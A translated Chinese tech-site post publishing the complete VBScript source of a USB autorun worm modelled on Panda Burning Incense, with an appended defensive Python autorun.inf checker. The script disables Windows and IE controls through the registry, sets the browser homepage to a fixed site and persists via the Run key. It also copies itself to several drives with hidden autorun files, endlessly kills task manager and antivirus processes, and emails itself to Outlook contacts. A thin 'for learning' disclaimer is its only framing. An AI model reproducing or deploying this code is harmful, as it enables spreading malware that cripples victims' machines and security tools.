
NYboy.vbs virus source code published: my simulation of Panda Burning Incense (熊猫烧香)

December 12, 2017 | 移动技术网, IT Programming


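Anyone who has used a USB flash drive knows that a USB-drive virus is an autorun (self-running) virus. When the drive is double-clicked, the virus body is triggered and copies itself to drives such as C, D and E and to system32 on the system drive (creating an exe file and an autorun.inf file), and it also modifies the registry. When you right-click a drive such as C:, there will be an "auto" command (in bold black) or two "start" commands. I have only been learning VBS for 15 days, and I too will simulate this autorun virus and part of the Panda Burning Incense functionality. My ability is limited, so this is the only kind of virus I can simulate. Disclaimer: I simulated this virus purely for learning and for the technique; do not use it to cause damage. If anyone uses my code to cause damage, they bear the consequences themselves.

on error resume next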
dim fso,wsh,myfile,ws,pp,fsofolder 
set wsh=wscript.createobject("wscript.shell") 
set fso=wscript.createobject("scripting.filesystemobject") 
set myfile=fso.getfile(wscript.scriptfullname)  
' Modify the registry (Start menu items and the various IE settings)
wsh.regwrite "hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue",0,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\start page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\search page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\default_page_url","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\default_search_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\start page","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\default_page_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\default_search_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\search page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubscriptions",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","c:\nyboy.vbs" 
wsh.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry",""
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\notraycontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\startmenulogoff",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosmhelp",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nonethood",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nowinkeys",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocsmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofind","1","reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nowindowsupdate",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofavoritesmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocshistory",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools","1","reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword"
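' Prevent the user from opening a hard drive by double-clicking; this could also be changed to prevent opening folders by double-clicking, which works the same way, so it is not repeated here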
wsh.regwrite "hklm\software\classes\drive\shell\auto\command\","c:\nyboy.bat '%1'" 
wsh.regwrite "hkcr\drive\shell\","auto"
wsh.regwrite "hkcr\drive\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hklm\software\classes\directory\shell\","auto"
wsh.regwrite "hkcr\directory\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hklm\software\classes\directory\shell\auto\command\","c:\nyboy.bat '%1'"
' Change the default file icons; these could be swapped for a cute panda
wsh.regwrite "hkcr\exefile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\txtfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\dllfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\batfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\inifile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\exefile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\txtfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\dllfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\batfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\inifile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\.reg\","txtfile"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","你好啊,大兵和你开个小小的玩笑"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","你已经中毒了,赶快杀毒或者与qq252287438联系"
' Copy itself to C, D, E, F and the USB drive
myfile.copy "c:\" 
myfile.copy "d:\" 
myfile.copy "e:\"
myfile.copy "f:\" 
myfile.copy "i:\" 
myfile.attributes=34 
' Define the contents of autorun.inf; this is the part of the code a USB-drive virus must have, and it can be written simply here
if fso.fileexists("c:\autorun.inf") then 
set objfolder = fso.getfile("c:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>c:\autorun.inf"_  
&"&& echo open=nyboy.bat >>c:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>c:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>c:\autorun.inf"_  
&"&& echo shell=auto>>c:\autorun.inf"_ 
&"&& attrib +h +s +r c:\autorun.inf" 
set autobatc=fso.createtextfile("c:\nyboy.bat",1,ture)
autobatc.writeline("nyboy.vbs")
end if
if fso.fileexists("d:\autorun.inf") then 
set objfolder = fso.getfile("d:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>d:\autorun.inf"_  
&"&& echo open=nyboy.bat >>d:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>d:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>d:\autorun.inf"_  
&"&& echo shell=auto>>d:\autorun.inf"_ 
&"&& attrib +h +s +r d:\autorun.inf" 
set autobatd=fso.createtextfile("d:\nyboy.bat",1,ture)
autobatd.writeline("nyboy.vbs")
end if
if fso.fileexists("e:\autorun.inf") then 
set objfolder = fso.getfile("e:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>e:\autorun.inf"_  
&"&& echo open=nyboy.bat >>e:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>e:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>e:\autorun.inf"_  
&"&& echo shell=auto>>e:\autorun.inf"_ 
&"&& attrib +h +s +r e:\autorun.inf" 
set autobate=fso.createtextfile("e:\nyboy.bat",1,ture)
autobate.writeline("nyboy.vbs")
end if
if fso.fileexists("f:\autorun.inf") then 
set objfolder = fso.getfile("f:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>f:\autorun.inf"_  
&"&& echo open=nyboy.bat >>f:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>f:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>f:\autorun.inf"_  
&"&& echo shell=auto>>f:\autorun.inf"_ 
&"&& attrib +h +s +r f:\autorun.inf" 
set autobatf=fso.createtextfile("f:\nyboy.bat",1,ture)
autobatf.writeline("nyboy.vbs")
end if
if fso.fileexists("i:\autorun.inf") then 
set objfolder = fso.getfile("i:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>i:\autorun.inf"_  
&"&& echo open=nyboy.bat >>i:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>i:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>i:\autorun.inf"_  
&"&& echo shell=auto>>i:\autorun.inf"_ 
&"&& attrib +h +s +r i:\autorun.inf" 
set autobatf=fso.createtextfile("i:\nyboy.bat",1,ture)
autobatf.writeline("nyboy.vbs")
end if
' Set the virus body's attributes to system, read-only and hidden
wsh.run "cmd /c attrib +h +s +r c:\nyboy.bat"_  
&"&& attrib +h +s +r d:\nyboy.bat"_  
&"&& attrib +h +s +r e:\nyboy.bat"_  
&"&& attrib +h +s +r f:\nyboy.bat"_  
&"&& attrib +h +s +r i:\nyboy.bat"
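' Forcibly terminate certain processes, such as QQ, Notepad, web pages, batch files, Kaspersky and RealPlay; once this is running, these cannot be opened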
do 
set ws=getobject("winmgmts:\\.\root\cimv2") 
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or name = 'qq.exe'or name = 'notepad.exe'or name = 'iexplore.exe'or name = 'cmd.exe'or name = 'avp.exe'or name = 'winrar.exe'or name = 'realplay.exe'or name = 'winword.exe'") 
for each i in pp 
i.terminate()
wscript.sleep 100 
next 
loop
' Allow the virus to spread by e-mail
set ol=createobject("outlook.application")
on error resume next
for x=1 to 5
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi").addresslists(1).addressentries(x)
mail.subject="今晚你来吗?"
mail.body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运!              qq交友频道"
mail.attachments.add("c:\nyboy.vbs")
mail.send
next
ol.quit
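
A defender-side check for the autorun.inf this script writes, as an added Python example that is not part of the original post: it parses the [autorun] section and reports entries that launch a file, including a default drive verb mapped to a command. The sample text is constructed from the echo commands above; the function names and the extension list are assumptions of this example.

```python
import re

# Constructed sample: the autorun.inf contents produced by the chain of
# "echo ... >>" commands in the script above (trailing spaces included).
SAMPLE_AUTORUN = (
    "[autorun]\n"
    "open=nyboy.bat \n"
    "shellexecute=nyboy.bat \n"
    "shell\\auto\\command=nyboy.bat\n"
    "shell=auto\n"
)

# Keys in the [autorun] section that name something to execute.
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
# Assumed list of extensions treated as scripts or executables.
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf",
              ".exe", ".scr", ".com", ".pif")


def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section, keys lowercased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def findings(text):
    """List the reasons this autorun.inf deserves a closer look."""
    entries, out = parse_autorun(text), []
    for key, value in entries.items():
        if EXEC_KEY.match(key):
            target = value.split()[0].strip('"').lower() if value else ""
            kind = "script/executable" if target.endswith(SCRIPT_EXT) else "command"
            out.append(f"{key} launches {kind}: {value}")
    verb = entries.get("shell")
    if verb and f"shell\\{verb.lower()}\\command" in entries:
        out.append(f"default drive verb '{verb}' is mapped to a command")
    return out


if __name__ == "__main__":
    for finding in findings(SAMPLE_AUTORUN):
        print(finding)
```

Because the script marks autorun.inf and nyboy.bat as hidden, system and read-only, a scan has to enumerate hidden and system files at each drive root before passing the file contents to `findings`.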
